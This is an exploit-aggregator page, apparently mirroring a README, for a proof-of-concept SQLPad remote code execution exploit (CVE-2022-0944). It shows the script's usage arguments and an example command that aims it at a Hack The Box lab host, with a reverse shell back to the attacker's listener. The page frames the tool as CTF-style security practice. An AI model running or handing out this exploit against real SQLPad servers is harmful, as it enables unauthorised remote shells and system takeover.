Share
## https://sploitus.com/exploit?id=C7DCAACC-DF0F-594D-9A1C-72C09C963E13
# CVE-2022-0944

Proof of concept exploit for [SQLPad RCE (CVE-2022-0944)](https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb) leading to a RCE with a revershell to the attackers PC.

## Usage

```
usage: script.py URL IP PORT

positional arguments:
  URL         URL to SQLPad
  IP       Listener host address for reverse shell
  PORT       Listener port for reverse shell
```

**Example:**

```bash
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
```

# Disclaimer
This repository contains tools that are intended solely for educational purposes, specifically for use in cybersecurity learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.